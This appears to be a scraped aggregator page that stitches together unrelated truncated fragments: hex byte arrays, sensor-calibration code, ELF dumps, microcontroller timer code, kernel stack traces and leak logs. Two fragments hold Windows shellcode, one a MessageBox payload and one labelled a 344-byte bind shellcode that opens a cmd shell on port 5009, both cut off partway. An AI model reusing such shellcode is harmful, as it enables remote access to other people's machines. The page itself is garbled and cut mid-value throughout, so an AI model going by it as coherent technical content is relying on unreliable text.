Time of Update: 2014-09-28
, 0x97, 0x2f, 0xe1, 0x58, 0xe0, 0x91, 0x9b, 0x82, 0x62, 0x0b,
0x58, 0xEE, 0xff, 0xff, 0x10, 0xd8, 0xcc, 0xc8, 0xea, 0x96, 0x6c, 0x8f, 0x13, 0x48, 0xe1, 0xaa,
0x4d, 0x46, 0x96, 0x6d, 0xb5, 0x8e, 0x96, 0x67, 0x73, 0x7f, 0x3b, 0x09, 0x0e, 0x25, 0x41, 0x49,
0xa3, 0xae, 0xd7, 0x5b, 0xa9, 0xa8, 0xd5, 0xb4, 0x76, 0x02, 0x6a, 0x5c, 0x52, 0x94, 0x54, 0xed,
0x18, 0x5a, 0x7f, 0x18, 0x00, 0x00, 0x84, 0x07, 0x1b, 0x80, 0x4a, 0x9a, 0x08, 0x35, 0xb8, 0x81,
0x50, 0xe7, 0xad, 0xbe, 0xc4, 0x8e, 0xb1, 0x4f, 0x2d,
Time of Update: 2014-10-02
, 0xa6,
0x03, 0x38, 0x71, 0x4b, 0x29, 0xd2, 0x47, 0x80, 0xe3, 0x84, 0x91, 0xf4 , 0x78, 0x43, 0x64, 0x41,
0x7b, 0x73, 0x99, 0x80, 0x42, 0x48, 0x00, 0xde, 0x00, 0x12, 0x88, 0x80, 0xdb, 0x51, 0x4a, 0x49,
0x84, 0x43, 0xf6, 0x51, 0x90, 0x27, 0x21, 0xc9, 0xf8, 0xac, 0x00, 0x4d, 0xcd, 0x46, 0x09, 0x9d,
0x15, 0x78, 0xe0, 0x00, 0x1e, 0x44, 0x2a, 0x51, 0x8c, 0xbc, 0xd3, 0xa3, 0x68, 0x8a, 0xd5, 0x3a,
0x20, 0x79, 0xba, 0x4d, 0x71, 0x4c, 0x0b, 0x91, 0x98, 0x90, 0x7
Time of Update: 2014-07-19
, 0x00, 0x0a, 0x6f, 0xf4 , 0 x, 0 x, 0 x, 0 x, 0 x, 0x00,
0xb2, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0xba, 0xe0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00,
0x4d, 0x55,0x15,0x15,0x20,0x00,0x00,0x95, 0xd5, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff, 0xe8, 0x40,0x40,0x00,0x00,0x00, 0x4a, 0xaa, 0x80 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff, 0xff, 0x2a, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00,
0xff, 0xfd, 0xd0, 0xaa, 0x01,0 X, 0 x, 0x25, 0x2
Time of Update: 2014-09-28
, 0x71, 0x4b, 0x29, 0xd2, 0x47, 0x80, 0xe3, 0x84, 0x91, 0xf4 , 0x78, 0x43, 0x64, 0x41,
0x7b, 0x73, 0x99, 0x80, 0x42, 0x48, 0x00, 0xde, 0x00, 0x12, 0x88, 0x80, 0xdb, 0x51, 0x4a, 0x49,
0x84, 0x43, 0xf6, 0x51, 0x90, 0x27, 0x21, 0xc9, 0xf8, 0xac, 0x00, 0x4d, 0xcd, 0x46, 0x09, 0x9d,
0x15, 0x78, 0xe0, 0x00, 0x1e, 0x44, 0x2a, 0x51, 0x8c, 0xbc, 0xd3, 0xa3, 0x68, 0x8a, 0xd5, 0x3a,
0x20, 0x79, 0xba, 0x4d, 0x71, 0x4c, 0x0b, 0x91, 0x98, 0x90, 0x7b, 0x2a, 0x42, 0xc
Time of Update: 2017-10-30
(Self.get2reg (0xAE)) self. AC4 = Self.get2reg (0xb0) self. AC5 = Self.get2reg (0xb2) self. AC6 = Self.get2reg (0xb4) self. B1 = Self.short (Self.get2reg (0xb6)) self. B2 = Self.short (Self.get2reg (0XB8)) self. MB = Self.short (Self.get2reg (0xBA)) self. MC = Self.short (Self.get2reg (0xBC)) self. MD = Self.short (Self.get2reg (0xBE)) self. UT = 0 self. Up = 0 self. B3 = 0 self. B4 = 0 self. B5 = 0 self. B6 = 0 self. B7 = 0 self. X1 = 0 self. X2 = 0 self. X3 = 0 def short (self, DAT):
Time of Update: 2018-06-05
, 0x33, 0x32, 0x2e, 0x64, 0x6c,0x6c, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x7 3, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6F, 0x20,0x57, 0x6F, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x64, 0x8b, 0x35,0x30, 0x00, 0x00, 0x00, 0x8b, 0x76, 0x0C, 0x8b, 0x76, 0x1C, 0x8b, 0x36, 0x8b, 0x56, 0x08, 0x53,0x52, 0xe8 , 0x14, 0x00, 0x00, 0x00, 0x8b, 0xF0, 0x52, 0x8d,0x4B, 0xBC, 0x51, 0x52, 0xFF
Time of Update: 2018-12-05
, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,0x33, 0xc0, 0x8b, 0x46, 0xf4 , 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xc
Time of Update: 2018-12-04
, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,0x33, 0xc0, 0x8b, 0x46, 0xf4 , 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,0x53, 0xff, 0x57,
Time of Update: 2018-12-04
Windows bind shellcode 344 bytes
By delphiscn (http://blog.csdn.net/delphiscn) cnblster # hotmail.com
Unsigned char scode [] = {/* Binding port on 5009 to wait a cmd shell */0x33, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xEE, 0xd9, 0 x, 0x24, 0xf4 , 0x5b, 0 x, 0x13, 0x3a,0x17, 0xbb, 0x19,0x83, 0xeb, 0xfc, 0xe2, 0xf4 , 0xc6, 0x7d, 0x50,0x54, 0xd2, 0xEE, 0x44, 0xe6,0xc5, 0x77,0x30,0x75, 0x1e, 0x33,0x30, 0x5c, 0x06, 0x9c,
Time of Update: 2018-12-04
: 4 Bytes: C0 00 00 00 memory size: 0xc0P_flags: 4 Bytes: 05 00 00 00 field markP_align: 4 Bytes: 04 00 00 00The phdr structure is roughly the same as above. Each structure defines the features of the ELF file and the attributes and sizes of each segment.Let's take a look at the pt_interp segment information:[Netconf @ linux1 elf] $ hexdump-s 84-N 32-C elf800000054 03 00 00 00 F4 00 00 00 F4 80 04 08 F4 80 04 08 | ....?..?..?.. |00000064 13 00 00 00 13 00 00 00 04 00 00 00 00 | .......... |This
Time of Update: 2018-12-08
, 0 x, 0 x, 0x00, 0xE8, 0x03, 0 x, 0x00, 0xE5, 0 x, 0 x, 0x00, 0xD0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x00, 0x0, 0 x, 0x0, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 58, 0xFD, 0xCC, 0x45, 0x64, 0x49, 0xB0, 0x70, 0xDD, 0xAE, 0x74, 0x2C, 0x96, 0xD2, 0x60, 0x5E, 0x0D, 0 x, 0 x, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x70, 0x5E, 0x0D, 0x00,0x02,0x00,0x00,0x00, 0x7C, 0x5E, 0x0D, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 96, 0xF1, 0xF1, 0x2A, 0x4D,
Time of Update: 2018-12-06
1, set the clock frequency to 128.
To sum up, the columns are as follows:
Obtain n = 62500, And the hexadecimal value is 0xf424. You must set t1cc0h = 0xf4 and t1cc0l = 0x24.(4) experiment source code and analysis /*
Lab Description: timer timer1 experiment, Timer count overflow, led1 flashing
*/
# Include
# Define led1 p1_0# Define led2 p1_1# Define led3 p1_2# Define led4 p1_3
/* System clock Initialization----------------------------------------
Time of Update: 2018-12-05
[
] (Asm_do_irq + 0x0/0x5c) from [
] (_ Irq_svc + 0x24/0 xa0)
Exception stack (0xc2e2bd98 to 0xc2e2bde0)
Bd80: 00000000 fb000000
Bda0: 00000001 00000000 c03c2a18 00000033 40000013 00000080 00000033
Bdc0: c39bfc80 c2e2be10 c2e2bdbc c2e2bde0 c007320c c0072748 60000013 ffffffff
R7: 00000080 R6: 00000010 R5: f4000000 R4: ffffffff
[
] (Setup_irq + 0x0/0x248) from [
] (Request_irq + 0xb0/0xcc)
[
] (Request_irq + 0x0/0xcc) from [
] (Dm9000_open + 0x16c/0x2
Time of Update: 2018-12-05
, 0x08,0x20,0x08,0x20, 0x0f, 0xe0, 0x00,0x04, 0xff, 0xfe, 0x01,0x00,0x09,0x20,0x09, 0xf0, 0x09,0x00,0x15,0x00,0x23,0x06,0x40, 0xfc, /* large */0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x04, 0xff, 0xfe, 0x0, 0 x, 0x80, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0 x, 0x10, 0 0 0, 0 0 0, 0x60, 0 x, 0x00,/* Cong */0x04, 0xfe, 0xcc, 0x24, 0x50, 0x24, 0x04, 0x3d, 0xfe, 0 x, 0 x, 0 x, 0 x, 0 x, 0x04, 0x3d, 0xfc, 0x25, 0 x, 0x24, 0x20, 0x24, 0xa4, 0xfd, 0x8a, 0x06, 0x8a, 0x04,0x78,0x04,0x00, // 0x01,0x
Time of Update: 2014-09-09
, 0x8a12 DB 0x04, 0x83, 0xc6, 0x01, 0x3c, 0x00, 0x74, 0x0913 DB 0xb4, 0x0e, 0xbb, 0x0f, 0x00, 0xcd, 0x10, 0xeb14 DB 0xee, 0xf4 , 0xeb, 0xfd, 0x0a, 0x0a, 0x68, 0x6515 DB 0x6c, 0x6c, 0x6f, 0x2c, 0x20, 0x77, 0x6f, 0x7216 DB 0x6c, 0x64, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x0017 RESB 36818 DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xaa19 DB 0xf0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x0020
Time of Update: 2018-12-04
:
================================================ DEBUG Memory leak at 0x50c010, size =[12]bytes Frame[0]: ./a.out [0x405ee5] Frame[1]: TestMalloc() Frame[2]: ./a.out(main+0x26) [0x4056fa] Frame[3]: /lib64/libc.so.6(__libc_start_main+0xf4 ) [0x2ab4fc643154] Frame[4]: ./a.out(__gxx_personality_v0+0x69) [0x405619] ================================================ DEBUG Memory leak at 0x50c160, size =[128]bytes Frame[0]: ./a.out [0x405d09] Frame
Time of Update: 2015-06-16
,...) + 0x2ec) [0x2ad4a9a5e15c]: [/U02/ggs/libgglog. so (_ MSG_ERR_CHECKPOINT_GENERIC (CSourceContext *, char const *, CMessageFactory: MessageDisposition) + 0x31) [0x2ad4a9a4f66b]]: [/U02/ggs/replicat (extract_start_point (time_elt_def *, time_elt_def *) + 0x165) [0x520775]: [/U02/ggs/replicat (replicat_main (int, char **) + 0x59f) [0x550f5f]: [/U02/ggs/replicat (ggs: gglib: MultiThreading: MainThread: ExecMain () + 0x4f) [0x5ef7ff]: [/U02/ggs/replicat (ggs: gglib: MultiThreading: Thread: RunTh
Time of Update: 2017-05-14
, 0x72, 0x4f, 0x24, 0x01, 0xe9, 0x66, 0x75, 0x4e, 0x2b, 0xd8, 0x6e, 0xe2, 0xfa, 0xc7, 0xa4, 0x85, 0x4e, 0xc2, 0xa5, 0x96, 0x6b, 0x58, 0x39, 0xd2, 0x7f, 0x44, 0xe5, 0x7b, 0x48, 0x2d, 0xf6, 0xdf, 0xbc, 0x31, 0x1e, 0xf6, 0xbf, 0x84, 0x6d, 0x5e, 0x33, 0x0c, 0x97, 0x5c, 0x39, 0x26, 0xf2, 0x9b, 0x77, 0x0d, 0xd6, 0xc0, 0x46, 0x38, 0x5f, 0xf4 , 0xe2, 0x9f, 0xf1, 0x7b, 0xe8, 0xbe, 0x37, 0xdf, 0xd0, 0xbd, 0xb9, 0x36, 0x2c, 0xd1, 0xc3, 0x40, 0xe7, 0xcc, 0xa9, 0x5
Time of Update: 2013-12-30
, 0xd7, 0x0d, 0xd1, 0xd8, 0xff, 0x13, 0x93, 0x70, 0xee, 0x5b, 0xef, 0xbe, 0x09, 0xb9, 0x77, 0x72, 0xe7, 0xb2, 0x54, 0xb7, 0x2a, 0xc7, 0x73, 0x90, 0x66, 0x20, 0x0e, 0x51, 0xed, 0xf8, 0x7c, 0x8f, 0x2e, 0xf4 , 0x12, 0xc6, 0x2b, 0x83, 0xcd, 0xac, 0xcb, 0x3b, 0xc4, 0x4e, 0xc0, 0x69, 0x36, 0x62, 0x02, 0xae, 0x88, 0xfc, 0xaa, 0x42, 0x08, 0xa6, 0x45, 0x57, 0xd3, 0x9a, 0xbd, 0xe1, 0x23, 0x8d, 0x92, 0x4a, 0x11, 0x89, 0x74, 0x6b, 0x91, 0xfb, 0xfe, 0xc9, 0x01, 0xe
Time of Update: 2017-04-28
:0xddc866a0-0xddc866a3. First byte 0x12 instead of 0xcc[2050.635123] info:allocated in try_to_corrupt_redzone+0x16/0x61 [myModule] age=1 cpu=0 pid=3146[2050.635255] alloc_debug_processing+0x63/0xd1[2050.635337] try_to_corrupt_redzone+0x16 /0x61 [mymodule][2050.635423] __slab_alloc.constprop.73+0x366/0x384[2050.635506] try_to_corrupt_redzone+0x16/0x61 [MyModule] [2050.635594] vt_console_print+0x21e/0x226[2050.635672] try_to_corrupt_redzone+0x16/0x61 [mymodule][2050.635758] kmem_cache_alloc_trace